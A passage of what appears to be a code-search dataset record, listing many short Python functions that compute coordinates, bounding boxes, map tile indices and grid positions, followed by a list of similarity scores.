self.transform[5] * self.shape[0]\n return left, right, bottom, top", "def positive_left_right_requirements(\n self,\n ) -> Tuple[Tuple[GriddedPerm, ...], Tuple[GriddedPerm, ...]]:\n left, right = [], []\n for (x, y) in self._tiling.active_cells:\n if self._fuse_row and y == self._row_idx:\n left.append(GriddedPerm.single_cell((0,), (x, y)))\n right.append(GriddedPerm.single_cell((0,), (x, y + 1)))\n if not self._fuse_row and x == self._col_idx:\n left.append(GriddedPerm.single_cell((0,), (x, y)))\n right.append(GriddedPerm.single_cell((0,), (x + 1, y)))\n return tuple(sorted(left)), tuple(sorted(right))", "def get_tile_index_range(dataset_filename):\n dataset = gdal.Open(dataset_filename)\n assert dataset, 'Unable to open dataset %s' % dataset_filename\n spatial_reference = osr.SpatialReference()\n spatial_reference.ImportFromWkt(dataset.GetProjection())\n geotransform = dataset.GetGeoTransform()\n logger.debug('geotransform = %s', geotransform)\n# latlong_spatial_reference = spatial_reference.CloneGeogCS()\n tile_spatial_reference = osr.SpatialReference()\n s = re.match('EPSG:(\\d+)', tile_type_info['crs'])\n if s:\n epsg_code = int(s.group(1))\n logger.debug('epsg_code = %d', epsg_code)\n assert 
tile_spatial_reference.ImportFromEPSG(epsg_code) == 0, 'Invalid EPSG code for tile projection'\n else:\n assert tile_spatial_reference.ImportFromWkt(tile_type_info['crs']), 'Invalid WKT for tile projection'\n \n logger.debug('Tile WKT = %s', tile_spatial_reference.ExportToWkt())\n \n coord_transform_to_tile = osr.CoordinateTransformation(spatial_reference, tile_spatial_reference)\n # Upper Left\n xmin, ymax, _z = coord_transform_to_tile.TransformPoint(geotransform[0], geotransform[3], 0)\n # Lower Right\n xmax, ymin, _z = coord_transform_to_tile.TransformPoint(geotransform[0] + geotransform[1] * dataset.RasterXSize, \n geotransform[3] + geotransform[5] * dataset.RasterYSize, \n 0)\n \n logger.debug('Coordinates: xmin = %f, ymin = %f, xmax = %f, ymax = %f', xmin, ymin, xmax, ymax)\n\n return (int(floor((xmin - tile_type_info['x_origin']) / tile_type_info['x_size'])), \n int(floor((ymin - tile_type_info['y_origin']) / tile_type_info['y_size'])), \n int(ceil((xmax - tile_type_info['x_origin']) / tile_type_info['x_size'])), \n int(ceil((ymax - tile_type_info['y_origin']) / tile_type_info['y_size'])))", "def get_tile_coordinates_for_registration(self, grid_number, tile_number):\n dx, dy = self.get_tile_coordinates_d(grid_number, tile_number)\n width_d = self.get_tile_width_d(grid_number)\n height_d = self.get_tile_height_d(grid_number)\n return int((dx - width_d/2) * 1000), int((dy - height_d/2) * 1000)", "def LongitudinalBounds(lng, num_tiles):\n # Normalize to between -180 and 180 degrees longitude.\n while lng < -180.0:\n lng += 360.0\n while lng >= 180.0:\n lng -= 360.0\n\n degrees_per_tile = 360.0 / num_tiles\n x = int((lng + 180.0) / degrees_per_tile)\n west = x * degrees_per_tile - 180.0\n return (west, west + degrees_per_tile)", "def bbox(self):\n lower = (self.x.min(), self.y.min())\n upper = (self.x.max(), self.y.max())\n return (lower, upper)", "def coordinates(self) -> Tuple[float, float, float, float, float]:\n return (self.x, self.y, self.x + self.width, self.y + self.height)", "def getMachineCoordinates(self):\n return (self.x, self.y, self.z)", "def ne_corner(self):\n return (self.max_lat, self.max_lon)", "def image_coordinates(self, temp):\n iy = np.array((temp.y[:,None]-self.extent[2])/self.spacing[1],dtype=np.int64)\n ix = np.array((temp.x[None,:]-self.extent[0])/self.spacing[0],dtype=np.int64)\n return (iy,ix)", "def bounds(self):\n return self.min_col, self.min_row, self.max_col, self.max_row", "def top_left(self):\n return Point(self.left, self.top)", "def getStartTlXY(self, lat, lng,zoom):\n tile_size = 256\n # Use a left shift to get the power of 2\n # i.e. 
a zoom level of 2 will have 2^2 = 4 tiles\n numTiles = 1 << zoom\n # Find the x_point given the longitude\n point_x = (tile_size/ 2 + lng * tile_size / 360.0) * numTiles // tile_size\n # Convert the latitude to radians and take the sine\n sin_y = math.sin(lat * (math.pi / 180.0))\n # Calulate the y coorindate\n point_y = ((tile_size / 2) + 0.5 * math.log((1+sin_y)/(1-sin_y)) * -(tile_size / (2 * math.pi))) * numTiles // tile_size\n return int(point_x), int(point_y)", "def get_cell_coords(self, pt):\n\n\t return int(pt[0] // self.a), int(pt[1] // self.a)", "def get_boundingbox(self):\n tile_iterator = iter(self)\n (coordinate,tile) = next(tile_iterator)\n assert(tile is not None)\n min_x = coordinate[0]\n max_x = min_x + 1\n min_y = coordinate[1]\n max_y = min_y + 1\n\n for (coordinate,tile) in tile_iterator:\n\n if coordinate[0] < min_x:\n min_x = coordinate[0]\n if coordinate[0]+1> max_x:\n max_x = coordinate[0] +1\n if coordinate[1] < min_y:\n min_y = coordinate[1]\n if coordinate[1]+1> max_y:\n max_y = coordinate[1] +1\n\n return ((min_x, min_y), (max_x, max_y))", "def bounds(self) -> tuple[float, float, float, float]:\n transform = self.transform\n a, b, c, d, e, f, _, _, _ = transform\n if b == d == 0:\n xs = (c, c + a * self.width)\n ys = (f, f + e * self.height)\n else: # rotated\n c0x, c0y = c, f\n c1x, c1y = transform * (0, self.height)\n c2x, c2y = transform * (self.width, self.height)\n c3x, c3y = transform * (self.width, 0)\n xs = (c0x, c1x, c2x, c3x)\n ys = (c0y, c1y, c2y, c3y)\n return min(xs), min(ys), max(xs), max(ys)", "def get_bounds_halo(self):\n bottom_right = np.asarray([self.coords_halo[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords_halo[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def get_cell_coords(pt):\n\n return int(pt[0] // a), int(pt[1] // a)", "def _get_top_left_coordinates(height, width, patch_size):\n\n n_h = math.ceil(height / patch_size)\n n_w = math.ceil(width / patch_size)\n tops = np.linspace(0, height - patch_size, n_h, dtype=int)\n lefts = np.linspace(0, width - patch_size, n_w, dtype=int)\n\n return product(tops, lefts)", "def upright(self):\n return Coord([self.x + 1, self.y - 1])", "def gen_gps_to_coords(lat,lon,rows,cols,min_lat,max_lat,min_lon,max_lon):\n\n if (lat <= min_lat or lat >= max_lat or lon <= min_lon or lon >= max_lon):\n return (-1,-1)\n\n lat_step = abs(max_lat-min_lat)/rows\n lon_step = abs(max_lon-min_lon)/cols\n\n lat_spot = int((max_lat-lat)/lat_step)\n lon_spot = int((lon-min_lon)/lon_step)\n #print \"lat: %f lon: %f lat_spot: %f lon_spot: %f\" % (lat,lon,lat_spot,lon_spot)\n return (lat_spot,lon_spot)", "def roi_x_offset():\n def r(x):\n return x & 0xFFF\n\n def w(x):\n return min(x, 0xFFF)\n return r, w", "def find_yolo_coordinates(y_top, y_bottom, x_left, x_right, width, height):\n w = (width - x_left - x_right) / width # width of bounding box\n h = (height - y_top - y_bottom) / height # height of bounding box\n x = (1 - w / 2) - x_right / width # x center of box (distance right from UL)\n y = (1 - h / 2) - y_bottom / height # y center of box (distance down from UL)\n\n return x,y,w,h", "def get_grid_locations(self, top_left, other_pos):\n cell_x = torch.floor(((other_pos[:, 0] - top_left[:, 0]) / self.neighborhood_size) *self.grid_size)\n\n # Added this part to implementation, otherwise the pooling is going to run into an indexing error\n cell_x[cell_x == self.grid_size] -= 1\n cell_y = torch.floor(((top_left[:, 1] - other_pos[:, 1]) / self.neighborhood_size) 
*self.grid_size)\n cell_y[cell_y == self.grid_size] -= 1\n grid_pos = cell_x + cell_y * self.grid_size\n\n return grid_pos", "def extend (self) :\n return (self.x_min, self.x_max, self.y_min, self.y_max)", "def gettpoints(self,left,top,tnum):\n if tnum == 0:\n x1 = left + CELLSIZE/2\n y1 = top\n x2 = x1 + TSIZE\n y2 = y1 + TSIZE\n x3 = x2 - 2*TSIZE\n y3 = y2\n if tnum == 1:\n x1 = left + CELLSIZE\n y1 = top + CELLSIZE/2\n x2 = x1 - TSIZE\n y2 = y1 + TSIZE\n x3 = x2\n y3 = y2 - 2*TSIZE\n if tnum == 2:\n x1 = left + CELLSIZE/2\n y1 = top + CELLSIZE\n x2 = x1 - TSIZE\n y2 = y1 - TSIZE\n x3 = x2 + TSIZE*2\n y3 = y2\n if tnum == 3:\n x1 = left\n y1 = top + CELLSIZE/2\n x2 = x1 + TSIZE\n y2 = y1 + TSIZE\n x3 = x2\n y3 = y2 - TSIZE*2\n\n return ((x1,y1),(x2,y2),(x3,y3))", "def bottomleft(self):\n return (self.left, self.bottom)", "def pupil_right_coords(self):\n if self.pupils_located:\n x = self.eye_right.origin[0] + self.eye_right.pupil.x + self.x_add\n y = self.eye_right.origin[1] + self.eye_right.pupil.y + self.y_add\n return (x, y)", "def get_img_coord_tuple(img):\n\n lat = convert_to_degress(get_gps_details(img)['GPSLatitude'])\n if get_gps_details(img)['GPSLatitudeRef'] == 'S':\n lat = -lat\n\n longitude = convert_to_degress(get_gps_details(img)['GPSLongitude'])\n if get_gps_details(img)['GPSLongitudeRef'] == 'W':\n longitude = -longitude\n\n return lat, longitude", "def res(self) -> tuple[float, float]:\n xs, ys = self.xcoords.data, self.ycoords.data\n dx, dy = 0, 0\n if xs.ndim == 1:\n dx = xs[1] - xs[0]\n dy = ys[1] - ys[0]\n elif xs.ndim == 2:\n ddx0 = xs[1, 0] - xs[0, 0]\n ddy0 = ys[1, 0] - ys[0, 0]\n ddx1 = xs[0, 1] - xs[0, 0]\n ddy1 = ys[0, 1] - ys[0, 0]\n dx = math.hypot(ddx1, ddy1) # always positive!\n dy = math.hypot(ddx0, ddy0)\n rot = self.rotation\n acos = math.cos(math.radians(rot))\n # find grid top-down orientation\n if (\n (acos < 0 and ddy0 > 0)\n or (acos > 0 and ddy0 < 0)\n or (\n ddy0 == 0\n and (np.isclose(rot, 270) and ddx0 < 0)\n or (np.isclose(rot, 90) and ddx0 > 0)\n )\n ):\n dy = -1 * dy\n return dx, dy", "def chr_coords(s):\n return max_y - (max_y - min_y)*s", "def get_tile_coordinates_d(self, grid_number, tile_number):\n origin_dx, origin_dy = self.cs.get_grid_origin_d(grid_number)\n return (origin_dx + self.grid_map_d[grid_number][tile_number][0],\n origin_dy + self.grid_map_d[grid_number][tile_number][1])", "def fetchbounds(self):\n pnts = [x for x in [self.out_start, self.start, self.in_start, \\\n self.in_end, self.end, self.out_end] \\\n if x is not None]\n return min(pnts), max(pnts)", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def top_right_tile_value(self):\n\t\treturn self.expected_cols", "def get_bottom_right(left, right):\n x = right.x - (right.x - left.x) / 8\n y = right.y - (right.y - left.y) / 8\n return (x, y)", "def getTilePos(self, pos = None):\n\n if not pos:\n pos = self.actor.getPos()\n \n for i in range(len(pos)):\n pos[i] = int(math.floor( (pos[i] + self.dimensions[i]) / 2.0))\n #pos[i] = int(math.floor( pos[i] / 2.0))\n\n return pos", "def normalized_position(self) -> Tuple[float, float]:\n x, y = self.relative_position\n return x / self.region.rect.width, y / self.region.rect.height", "def normalized_position(self) -> Tuple[float, float]:\n x, y = self.relative_position\n return x / self.region.rect.width, y / self.region.rect.height", "def test_mines_left_coordinates(self):\n pg.font.init()\n mines_coords = utils.mines_left_coords(1)\n self.assertIsInstance(mines_coords, tuple)", "def get_pos(x, 
y):\r\n return normalize(x) // 2, normalize(y) // 4", "def get_xrange_indices(self, lower, upper) -> Tuple[int, int]:\n lower_index = np.argmax(self.x >= lower)\n upper_index = np.argmax(self.x >= upper)\n return int(lower_index), int(upper_index)", "def _get_xy_lims(self):\n \n x = self.datapos[0] - 1\n y = self.datapos[1] - 1\n\n return x, y", "def get_uv_positions(data, image_size, target_grid, up_vector, right_vector, tile_xy, verts, vtx_center):\n\n return get_uv_pos_size(data, image_size, target_grid, tile_xy,\n target_grid.grid[0], target_grid.grid[1],\n up_vector, right_vector,\n verts, vtx_center)", "def coordinates(self) -> Tuple[int, int]:\n return self.x, self.y", "def region_points(x, y, width, xmin, xmax):\n right = (x, y + width / 2)\n top = (xmax, y)\n left = (x, y - width / 2)\n bottom = (xmin, y)\n return (right, top, left, bottom)", "def grid_coords(self):\n return [(x, y) for y in range(self.height) for x in range(self.width)]", "def extent(self):\n\n x = np.array([0, self.nx]) * self.dx + self.corner_grid.x0\n ypoint = [0, self.ny] if self.origin == 'lower-left' else [self.ny, 0]\n y = np.array(ypoint) * self.dy + self.corner_grid.y0\n\n return [x[0], x[1], y[0], y[1]]", "def left(self):\n return self.points['topLeft'].x", "def left(self):\n return self.points['topLeft'].x", "def bounds(self):\n return (\n self.x, self.y,\n self.x, self.y\n )", "def extents(self):\n x0, y0, width, height = self._rect_bbox\n xmin, xmax = sorted([x0, x0 + width])\n ymin, ymax = sorted([y0, y0 + height])\n return xmin, xmax, ymin, ymax", "def get_min_max(self):\n\n mr = np.sqrt(2 * np.log(1/self.mth)) * self.ms\n mr[:] = np.max(mr)\n\n mxmin = self.mx - mr\n mxmax = self.mx + mr\n mymin = self.my - mr\n mymax = self.my + mr\n mzmin = self.mz - mr\n mzmax = self.mz + mr\n\n mb_xmin_idx = np.argmin(mxmin[self.ma > 0])\n mb_xmax_idx = np.argmax(mxmax[self.ma > 0])\n mb_ymin_idx = np.argmin(mymin[self.ma > 0])\n mb_ymax_idx = np.argmax(mymax[self.ma > 0])\n mb_zmin_idx = np.argmin(mzmin[self.ma > 0])\n mb_zmax_idx = np.argmax(mzmax[self.ma > 0])\n\n xmin0 = self.mx[mb_xmin_idx] - mr[mb_xmin_idx]\n xmax0 = self.mx[mb_xmax_idx] + mr[mb_xmax_idx]\n ymin0 = self.my[mb_ymin_idx] - mr[mb_ymin_idx]\n ymax0 = self.my[mb_ymax_idx] + mr[mb_ymax_idx]\n zmin0 = self.mz[mb_zmin_idx] - mr[mb_zmin_idx]\n zmax0 = self.mz[mb_zmax_idx] + mr[mb_zmax_idx]\n\n xmin = xmin0 - (xmax0 - xmin0) * 0.25\n xmax = xmax0 + (xmax0 - xmin0) * 0.25\n ymin = ymin0 - (ymax0 - ymin0) * 0.25\n ymax = ymax0 + (ymax0 - ymin0) * 0.25\n zmin = zmin0 - (zmax0 - zmin0) * 0.25\n zmax = zmax0 + (zmax0 - zmin0) * 0.25\n\n return xmin, xmax, ymin, ymax, zmin, zmax", "def upper_right(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.right, self.top", "def restored_position(self) -> Tuple[int, int]:\n x_n, y_n = self.normalized_position\n w, h = self.region.original_size\n return int(x_n * w), int(y_n * h)", "def restored_position(self) -> Tuple[int, int]:\n x_n, y_n = self.normalized_position\n w, h = self.region.original_size\n return int(x_n * w), int(y_n * h)", "def get_pos(self):\n return (self.x, self.y)", "def node_to_coords(self,node_num):\n row = (node_num - 1) / self.cols\n col = (node_num - 1) % self.cols\n return (row,col)" ]
[ "0.67502934", "0.65008754", "0.6489868", "0.6368388", "0.6322317", "0.63027024", "0.62114066", "0.6206572", "0.6173504", "0.61361134", "0.6121037", "0.6087851", "0.60849476", "0.6061991", "0.6028953", "0.59848636", "0.59517145", "0.59340775", "0.5899759", "0.589703", "0.58896315", "0.5879526", "0.58723646", "0.5855794", "0.5810314", "0.5799515", "0.5790533", "0.5788975", "0.5769757", "0.5758871", "0.57432973", "0.5741471", "0.57384056", "0.5735267", "0.57330817", "0.57330817", "0.5730476", "0.5726652", "0.57261693", "0.572043", "0.57091457", "0.5707628", "0.57052004", "0.56875336", "0.5655426", "0.5645721", "0.5639985", "0.56333053", "0.5602915", "0.5599982", "0.55999297", "0.55738425", "0.5569438", "0.55689603", "0.5562546", "0.55595", "0.5557271", "0.5557217", "0.5553043", "0.55524445", "0.55473334", "0.5540967", "0.5538647", "0.55335146", "0.55302155", "0.5520543", "0.5520056", "0.5512424", "0.55102175", "0.5508274", "0.55039257", "0.54996103", "0.5498404", "0.5490007", "0.54894847", "0.5489164", "0.54871297", "0.54815936", "0.5479889", "0.5478756", "0.5473168", "0.5473168", "0.5471", "0.546975", "0.54691815", "0.5463697", "0.54557997", "0.5455175", "0.5452328", "0.5452043", "0.5448572", "0.544536", "0.544536", "0.5441362", "0.5441037", "0.54405576", "0.54328036", "0.5428839", "0.5428839", "0.542655", "0.5425845" ]
0.0
-1
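The objective metadata at the top of this row declares a triplet structure over the query, document, and negatives columns. As a minimal sketch only — the helper name `iter_triplets`, the assumption that each row arrives as a plain dict with a `metadata` field carrying the objective shown above, and the loading step are all illustrative, not part of the dump — such a row could be expanded into contrastive training triplets as follows:

```python
# Illustrative sketch: expand one row of this dump into (anchor, positive,
# negative) triplets according to its "triplet" objective. The row layout
# and helper name are assumptions, not defined by the dataset itself.
from typing import Iterator, Tuple


def iter_triplets(row: dict) -> Iterator[Tuple[str, str, str]]:
    """Yield (anchor, positive, negative) triplets as declared by the
    "triplet" objective in the row's metadata."""
    objective = row.get("metadata", {}).get("objective", {})
    for fields in objective.get("triplet", []):
        # `fields` is a triple of column names, e.g.
        # ["query", "document", "negatives"]; the last one names the
        # list-valued column holding the negative passages.
        anchor_key, positive_key, negatives_key = fields
        anchor = row[anchor_key]
        positive = row[positive_key]
        for negative in row[negatives_key]:
            yield anchor, positive, negative
```

With rows loaded via `json.loads` or a datasets-style loader, the yielded triplets could feed a standard triplet-margin or InfoNCE-style contrastive loss, and the accompanying list of per-negative floating-point scores could serve as a basis for hard-negative filtering.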